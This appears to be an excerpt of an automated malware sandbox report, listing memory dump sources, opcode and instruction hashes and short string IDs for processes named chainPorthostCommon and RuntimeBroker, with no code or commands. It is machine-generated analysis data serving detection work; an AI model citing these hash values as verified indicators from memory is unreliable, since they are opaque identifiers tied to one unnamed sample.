                                                                                    • Opcode Fuzzy Hash: ff479655eaa78f25bde5bb6171f506b4df4e4240a6acc775a42093cc68e09bc7
                                                                                    • Instruction Fuzzy Hash: 04518F76B18A4D8BE798DB5C98657F9BFE1FB9A310F5002BFC009D76D1CAB914118B00

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2364332811.00007FFD347E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd347e0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID: FullImageNameProcessQuery
                                                                                    • String ID:
                                                                                    • API String ID: 3578328331-0
                                                                                    • Opcode ID: 576146864a6a8ebafac5cd2f306df8e716da4186193ae0d1e4a1b3d98ad089a3
                                                                                    • Instruction ID: 75e5f0b74f10db6b7a4468741e5bb01f978e08d1240bf7cc52e87d39e2fb3ea3
                                                                                    • Opcode Fuzzy Hash: 576146864a6a8ebafac5cd2f306df8e716da4186193ae0d1e4a1b3d98ad089a3
                                                                                    • Instruction Fuzzy Hash: 4171A470618A8C8FDB68DF28D8957F937E1FB59311F04422EE84EC7292CB75A845CB81

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7J4
                                                                                    • API String ID: 0-1321531618
                                                                                    • Opcode ID: c63b62705ba12ab851b81aa8b888fbd1846e2e2150d896f3efb810b2873d7714
                                                                                    • Instruction ID: 83ee54297cad118e0d738aa7982e94436bb3acc2df82c39e706a4b8dc2ee17d2
                                                                                    • Opcode Fuzzy Hash: c63b62705ba12ab851b81aa8b888fbd1846e2e2150d896f3efb810b2873d7714
                                                                                    • Instruction Fuzzy Hash: 79416622B4D56A0EE711B3BC64BA2F97BA0DF46321F1805BFD58DC71D3CD2968818280

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7J4
                                                                                    • API String ID: 0-1321531618
                                                                                    • Opcode ID: 51c8106e3070ad5d835b2b673346248b16e92062aa1a17bcf48a1b76faaae9ce
                                                                                    • Instruction ID: a657ab90f7ff5c8ecc9f8d1e98211a85af33423bd29edf53e0d1dbffb3d9c3bb
                                                                                    • Opcode Fuzzy Hash: 51c8106e3070ad5d835b2b673346248b16e92062aa1a17bcf48a1b76faaae9ce
                                                                                    • Instruction Fuzzy Hash: 97313722B0D95A1FE754B3AC64AA6F973D5DF4A321F1400BFD40EC31D3CD2DA8818284

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7J4
                                                                                    • API String ID: 0-1321531618
                                                                                    • Opcode ID: 95ec71e36e969429fa9b4265082e4b314b8fa0313451ed826faac71bddb368c0
                                                                                    • Instruction ID: a6e109fe895a8820180816996cf6930b01da69b1f5e4dc1e841b485adf96e96e
                                                                                    • Opcode Fuzzy Hash: 95ec71e36e969429fa9b4265082e4b314b8fa0313451ed826faac71bddb368c0
                                                                                    • Instruction Fuzzy Hash: 9E213521B5C95A0FE748F72C98BA6B977C2EF9A310F0400BDE84EC32D3DD28AC418644
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2361395915.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd343f0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: db0aef072ec64929b5b35d505abda884b126e8e6653ca62790435b13f0a165cb
                                                                                    • Instruction ID: f635705e41577bd4d972c219ecfbd37066fccb1de74bde070d647042dbdc5e89
                                                                                    • Opcode Fuzzy Hash: db0aef072ec64929b5b35d505abda884b126e8e6653ca62790435b13f0a165cb
                                                                                    • Instruction Fuzzy Hash: 4A210436B0E2898FE312EB2C88A51DD7FB0DF43324F1541B6C180DB192E93C16499781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2362677341.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 839cf054f40f1eaf073a754b952fd925ededef5316f6ec54510772f4045a6471
                                                                                    • Instruction ID: fb0147643ad015df662eae5a1cd7672db4baeb94f9e03f3e46305a029038bce0
                                                                                    • Opcode Fuzzy Hash: 839cf054f40f1eaf073a754b952fd925ededef5316f6ec54510772f4045a6471
                                                                                    • String ID: xqD4
                                                                                    • API String ID: 0-1868377020
                                                                                    • Opcode ID: f908433729c5a26e36787d8d9dc897df0a8e915014a74284684ce7907ca15c65
                                                                                    • Instruction ID: 4dcae65e69a554b40bb7ebfe31b7319b117f01102775e7a38ee0109d99cd7382
                                                                                    • Opcode Fuzzy Hash: f908433729c5a26e36787d8d9dc897df0a8e915014a74284684ce7907ca15c65
                                                                                    • Instruction Fuzzy Hash: 4102D3B0A2EA4ACFD369DB28C4E157977A1FF47300B14457EC14EC3682DA2DB8499B81
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `){4
                                                                                    • API String ID: 0-3229680120
                                                                                    • Opcode ID: 6c8481de46c7313b9e0c25e9e13ec92605f7b2877122d0a153e65b0ac0d6df6c
                                                                                    • Instruction ID: 933d8bfa89c511456fe16384dc3f96e25b6a4777166c6869f6e70ec320173789
                                                                                    • Opcode Fuzzy Hash: 6c8481de46c7313b9e0c25e9e13ec92605f7b2877122d0a153e65b0ac0d6df6c
                                                                                    • Instruction Fuzzy Hash: 86B1B370A2D68ECFEB65DB6488A16F87BA0EF4B300F1401BAD14ED7181DA3C7949D790
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: S4
                                                                                    • API String ID: 0-610221366
                                                                                    • Opcode ID: 164072062b1de6929f0cce79f08ab4dd134dbbe2abd37851f4d6eadb21cbdf29
                                                                                    • Instruction ID: ed85edb4c3eaa9e4fa8d077f949e83888c07b14b6bc0bd3ef5476e08e2673806
                                                                                    • Opcode Fuzzy Hash: 164072062b1de6929f0cce79f08ab4dd134dbbe2abd37851f4d6eadb21cbdf29
                                                                                    • Instruction Fuzzy Hash: 2981BF70E2E64ACFEB55EB6488A06BD7BA5EF5B300F14057AD10ED3192DE2C7845E780
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: M
                                                                                    • API String ID: 0-3664761504
                                                                                    • Opcode ID: 9ec6be2cf743979a0d9ea3f75b50f4d21751718cdce5517d395cfedcfe34b69d
                                                                                    • Instruction ID: 1f24a333e56adc14d5e899d85fee624994d9fab6ddfdf67251c583bb5e992d95
                                                                                    • Opcode Fuzzy Hash: 9ec6be2cf743979a0d9ea3f75b50f4d21751718cdce5517d395cfedcfe34b69d
                                                                                    • Instruction Fuzzy Hash: 28510471A1E6C99FDB429B3488A44E97FB0EF07314F0800FAC149DB193CA2D784ACB81
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: pS4
                                                                                    • API String ID: 0-684799425
                                                                                    • Opcode ID: 180de8c951001c3fe394baaf49d36823e9a950fb66ac4cb743cc80e25fdff773
                                                                                    • Instruction ID: 29c4ff032d57c739d95140c72773c0de8cd7a9f1fc24ecacc1621e3fff8fa8e4
                                                                                    • Opcode Fuzzy Hash: 180de8c951001c3fe394baaf49d36823e9a950fb66ac4cb743cc80e25fdff773
                                                                                    • Instruction Fuzzy Hash: E8510B7172D989CFE794DB2C98A56B837D1FF9A314F0401B9D54DC3292DD28BC098780
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: 22bfa430db9ea7fd50dbefd95baf656ebc12713ec3f7c6299913f7ec5e9bd570
                                                                                    • Instruction ID: 82b48072606b8c06518232359d93faaf39ec2fcb0c9044f8e8d437112b77b981
                                                                                    • Opcode Fuzzy Hash: 22bfa430db9ea7fd50dbefd95baf656ebc12713ec3f7c6299913f7ec5e9bd570
                                                                                    • Instruction Fuzzy Hash: 3A517AB1E1950E8FEB58DB98D4A55FCB7B1FF46310F1041BAC01AE7286CA396906DB90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7I4
                                                                                    • API String ID: 0-1709812513
                                                                                    • Opcode ID: 4de02b6566ec6ffb681d659cb57d115a4ccd1a9e1e03ca245fb12db1f45a581a
                                                                                    • Instruction ID: 1d11f3727f6bd10f0c7585d3c369f1028d03f781c203b70f523b6f750ed05789
                                                                                    • Opcode Fuzzy Hash: 4de02b6566ec6ffb681d659cb57d115a4ccd1a9e1e03ca245fb12db1f45a581a
                                                                                    • Instruction Fuzzy Hash: 82412712B0E6650AE716F7BC64B56FA7B90DF46325B1804BFD14EC71D3CD2968818281
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: 193dd68cd01778b81dffcb33eee519d6451f8adf54fc4537c6a69fe7f54e7836
                                                                                    • Instruction ID: 47ecd92017654f446d464f81c4b290c85482a5d360a187015411514489a6a6f4
                                                                                    • Opcode Fuzzy Hash: 193dd68cd01778b81dffcb33eee519d6451f8adf54fc4537c6a69fe7f54e7836
                                                                                    • Instruction Fuzzy Hash: 5F519CB0E2950ECFDB59DB98C4A45FDB7B1FF46300F15007AC11AE7296CA386805DB90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7I4
                                                                                    • API String ID: 0-1709812513
                                                                                    • Opcode ID: 5087e3f2b58b59c0a677272ab04028e72abd833565c5f4050b224bd14e519034
                                                                                    • Instruction ID: 8e29eac825fc3a892da7849d5886772eb2ff4e49dbfcdc0e12a7c8327c2f00c1
                                                                                    • Opcode Fuzzy Hash: 5087e3f2b58b59c0a677272ab04028e72abd833565c5f4050b224bd14e519034
                                                                                    • Instruction Fuzzy Hash: BA310622B0E9191AE765F7AC64A66FA73D5DF49325F1800BAD40EC31D3CD2DAC824280
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7I4
                                                                                    • API String ID: 0-1709812513
                                                                                    • Opcode ID: 46445e6eb19786c3fd40b090941a27675934c7f80e063eb33e89dadaac5e7325
                                                                                    • Instruction ID: ec291468aa96792a7aada4c99059b16646e3625ac952b39f621682edd84f428d
                                                                                    • Opcode Fuzzy Hash: 46445e6eb19786c3fd40b090941a27675934c7f80e063eb33e89dadaac5e7325
                                                                                    • Instruction Fuzzy Hash: 4C212821B1A95D0FE794F66C94AA6B977C1EB89314F1800BDE40EC32D3DD3CAC828640
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343f0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: M
                                                                                    • API String ID: 0-3664761504
                                                                                    • Opcode ID: f7ba76cc6caa1d35af2fbcf404c8cdebd9418b273fa991598286f8ca28e0404a
                                                                                    • Instruction ID: 778425cac4266aed0294f3a97e10546f00a5423ae4d37f02fc37ff4922add963
                                                                                    • Opcode Fuzzy Hash: f7ba76cc6caa1d35af2fbcf404c8cdebd9418b273fa991598286f8ca28e0404a
                                                                                    • Instruction Fuzzy Hash: 46F0657194F3C04FCB5AAA3588A94547F60EF6720174A51EEC095CF1E7DA2DDC85C701
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e87bbc1b0b72dbdecc4dfa6c627b818f9589dd18df27dc333edd9cffd28de247
                                                                                    • Instruction ID: f356f8860f1215f828a10885fbb1047e018c83e45ad2d2acc37274f3bfe78280
                                                                                    • Opcode Fuzzy Hash: e87bbc1b0b72dbdecc4dfa6c627b818f9589dd18df27dc333edd9cffd28de247
                                                                                    • Instruction Fuzzy Hash: CB31F692F2F6D6CAF769522924B50BC7B805F47328F28A57BD68DC60C2DD0C344872C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 10c60074b50f11be0ce60277c6c25bb00f9f90a589beacb385e4683083d76c4a
                                                                                    • Instruction ID: 32e306da33a86c6642c0b3fc2cb76d44427629a34e31e41893fe8ed292c9220c
                                                                                    • Opcode Fuzzy Hash: 10c60074b50f11be0ce60277c6c25bb00f9f90a589beacb385e4683083d76c4a
                                                                                    • Instruction Fuzzy Hash: 82F1D93471C8198FDBC8FB68D4A5E6573D2EBA8704B1540A9E10FC72B6CE25EC56CB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fe11e60891f300c0e6b2b0a0f5507df011906a27b6ec7be19d56fa83c5e0d584
                                                                                    • Instruction ID: 7e6e2190e7edb7d1fdd2cb57664613d8cbcc315bb1cf6528040266134dd739df
                                                                                    • Opcode Fuzzy Hash: fe11e60891f300c0e6b2b0a0f5507df011906a27b6ec7be19d56fa83c5e0d584
                                                                                    • Instruction Fuzzy Hash: 75F1D0B062A545CFEB59CF18C4E06B477A1FF46300B5545BDC95ACB69ACA3CF885CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4ad78bf1cf8188437cb6158bce1e42d8d042f9e79e7b9932090d1dbcff5af299
                                                                                    • Instruction ID: 4f7b652235cc5705c196bdbe44e91638bc88c1a2291019e0df99d3819516078f
                                                                                    • Opcode Fuzzy Hash: 4ad78bf1cf8188437cb6158bce1e42d8d042f9e79e7b9932090d1dbcff5af299
                                                                                    • Instruction Fuzzy Hash: 60E11470A2EB468FE368DB28D4E0575B7E1FF47304B14067EC58EC7582DA2DB84A9781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6cef0f31e56af6cbb2b339fbe7f5c9c820b57917b90c0957c4be8fce9eae384a
                                                                                    • Instruction ID: c91e09a1202702516aa1cc8e067447d03e2339430040ce3c05a02627ffd5a6dd
                                                                                    • Opcode Fuzzy Hash: 6cef0f31e56af6cbb2b339fbe7f5c9c820b57917b90c0957c4be8fce9eae384a
                                                                                    • Instruction Fuzzy Hash: 83E17D706295568BEB59CF18C4E16B577A1FF46300B5442B9C94ACB28ACA38F886DB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5b4d3076c2c94d8f4cf4305b29070581d0e02b43263d07a896c9854e6e4b42c9
                                                                                    • Instruction ID: 46efc79479f755465b522e5c2c7a9748230753800527b1b7de6ee3be71c84612
                                                                                    • Opcode Fuzzy Hash: 5b4d3076c2c94d8f4cf4305b29070581d0e02b43263d07a896c9854e6e4b42c9
                                                                                    • Instruction Fuzzy Hash: 9FC1D1B0B2DA468FE749DB28C4A16A4B7A1FF4A300F444579D14EC7A86CB2CB85687D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e146ef460286b38e7093041325de3e3bf7fa56e67da006b7b1a81208c1c41855
                                                                                    • Instruction ID: 85b190e56a32a54121e50a86337ed34d32d09ae19052d9fdb9f9ce7c329390dd
                                                                                    • Opcode Fuzzy Hash: e146ef460286b38e7093041325de3e3bf7fa56e67da006b7b1a81208c1c41855
                                                                                    • Instruction Fuzzy Hash: 22B112B0B29A468FE349DB28C4A06B4B7A1FF4A310F454179C15EC7A97DB2CB8558BD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d29f6c42f5dd853ff1d5b699a818c330680091b3110206dbc8e5239fc264f871
                                                                                    • Instruction ID: 602ec9c9a0b3ea1c84f105c63e9a89e5206835b9f4fffb48a00acc2ff878a385
                                                                                    • Opcode Fuzzy Hash: d29f6c42f5dd853ff1d5b699a818c330680091b3110206dbc8e5239fc264f871
                                                                                    • Instruction Fuzzy Hash: 81C1AF70629546CBEB19CF18C4E05B537A1FF46300B5446BDD94BCB68ACA3CF886DB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e92001671f7925e8ac17c80f8230c384c033716b9896fb50e551fb16763307c7
                                                                                    • Instruction ID: 06cb2c30aef9e96d626341f7ce765e478fe93233a54de923af6b8e52ab7042ed
                                                                                    • Opcode Fuzzy Hash: e92001671f7925e8ac17c80f8230c384c033716b9896fb50e551fb16763307c7
                                                                                    • Instruction Fuzzy Hash: 2121D582F2E193CBF6A9626D24F51F83A405F972A1F180677D24EDA1C2DC0C788932C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1ea92ccc7da6383c36218704e7dad1fd09a23c32cf7a16c3634b8606f57d3254
                                                                                    • Instruction ID: 1c2d2f5542ef19be2c64db87ea76cf0820cacaef7904e48827341070e802179c
                                                                                    • Opcode Fuzzy Hash: 1ea92ccc7da6383c36218704e7dad1fd09a23c32cf7a16c3634b8606f57d3254
                                                                                    • Instruction Fuzzy Hash: 63918C71B2EA468FE3399A2894A51B577D0EF93310B14057ED58FC3183DE2CB80B9791
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4322c97e51c9551a6476cc8e08a7a0171f4c3ce184f21648b1a01329aa87e1df
                                                                                    • Instruction ID: 3c95198801618c724e8ac414436fca8424b419f29fd2b6cbf4259c1be712da1c
                                                                                    • Opcode Fuzzy Hash: 4322c97e51c9551a6476cc8e08a7a0171f4c3ce184f21648b1a01329aa87e1df
                                                                                    • Instruction Fuzzy Hash: C88139B2B2EA468FE3759A1C94A11F977E1EF87310B14057ED58EC3182DE2C790A57C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f2223d5c3b9f025823d8f1ef8aa9e6933f9113653a8d13e1d53b29cd07ab27e5
                                                                                    • Instruction ID: f51c5a16615dde019649f835052ee028663938ddb60975217e40be76fbfaa037
                                                                                    • Opcode Fuzzy Hash: f2223d5c3b9f025823d8f1ef8aa9e6933f9113653a8d13e1d53b29cd07ab27e5
                                                                                    • Instruction Fuzzy Hash: 0071056061D7C68FD71A8B2888B10B47BA0EF47214B2946BEC1DBCB5D3D91DA84BD391
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0936b92794f98d6218f0c29a6d4ff29f3cb8f3de5c05ab9730618d3cf6bdf867
                                                                                    • Instruction ID: f9ca22b751bbfc566fabc5745fbf6d22f27d7e7de26f65c6d126eb1ed9b755a9
                                                                                    • Opcode Fuzzy Hash: 0936b92794f98d6218f0c29a6d4ff29f3cb8f3de5c05ab9730618d3cf6bdf867
                                                                                    • Instruction Fuzzy Hash: 5471F470A2D54ECFEB65EB6488A46BD7BB4EF57300F1005BAD10ED71A2DA2C78499780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4c25983e88d4a9d7a40cc33922a5e28ed28c3962157e5d8edb7fed471c547697
                                                                                    • Instruction ID: 72648960b6f0c06233aa190ab9679f27946b08a9264a7bf6f28a519d2c71ecfd
                                                                                    • Opcode Fuzzy Hash: 4c25983e88d4a9d7a40cc33922a5e28ed28c3962157e5d8edb7fed471c547697
                                                                                    • Instruction Fuzzy Hash: F0516F70A1955D8FDB98EB18C4A0BB877F0FF56300F1441BAD10DE3291DA396985DF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f80ef6a04d57ddb84698dbfda7a9d3cf608259f2fde144eccedfaf7d3a82d123
                                                                                    • Instruction ID: 68dce1c3957c284349dcc3b0f1a68229fa59851a95999c05e74fb36fc4864df6
                                                                                    • Opcode Fuzzy Hash: f80ef6a04d57ddb84698dbfda7a9d3cf608259f2fde144eccedfaf7d3a82d123
                                                                                    • Instruction Fuzzy Hash: 0A41507260D9098FDF98FB18C4A5EA4B7E1FBA9314B04016AD04EC3292DE25FC45DB81
                                                                                    Memory Dump Source
